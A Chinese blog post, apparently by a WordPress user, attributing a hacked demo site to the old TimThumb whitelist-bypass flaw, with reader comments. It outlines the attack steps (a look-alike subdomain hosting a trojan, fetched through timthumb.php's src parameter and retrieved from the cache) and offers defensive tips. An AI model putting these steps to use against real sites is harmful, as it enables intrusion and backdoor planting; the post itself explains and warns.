demo站之前出的问题我实在是不服气, 今天跑上来检查了, 得出结论九成是timthumb漏洞导致的.
Timthumb漏洞已经出来许多年了, 老版本的Timthumb由于白名单域名过滤机制的不完善, 给了hackers绕过验证的机会, 所以被黑风险很大.
国外论坛上也有对这个老问题的讨论,
Are you using an outdated version for timthumb? So many wordpress sites are getting hacked cause of that. If I was you I would replace the entire website. Chances are almost every file has a backdoor. You basically need to reinstall everything.
某胖子大牛前年就写过一篇利用Timthumb漏洞hack的演示, 总结大概步骤是这样: 建立一个三级域名的网站,地址为http://白名单域名.你的域名 , 比如http://picasa.com.域名.com, 并上传一个自己的木马, 然后访问目标网站路径/timthumb.php?src=http://http://flickr.com.域名.com/木马.php, 这个时候并不能直接访问结果, 但结果已经保存在Timthumb的cache路径下了, 然后就可以在cache下得到md5值.
这个hack本身已经过期了, 但是如果使用了过期的timthumb插件就必然会被秒0了, 注意软件漏洞发布, 如果文件多出来eval(function(..之类的查询肯定是被黑了, 多留神吧
我很喜欢你们啊~我觉得你们很可爱~
我很喜欢你们啊~我觉得你们很可爱~
这个是我的部落格,大家有空可以看看啊~要翻墙哦~我是马来西亚人。
jonylifefighter.blogspot.com
曾经被这个漏洞啪啪啪了。。
女神,你好腻害..
发现又换主题了 ~~
@A.yi 已经换了有段时间了
这文件搞的很多WPER都有心理阴影了。。。。。
刚写的图床就用到这个漏洞类似的思路,现在我的图床可以在360/华为/百度/腾讯等旗下各种站点上传图片,图床只保存一个uri就可以了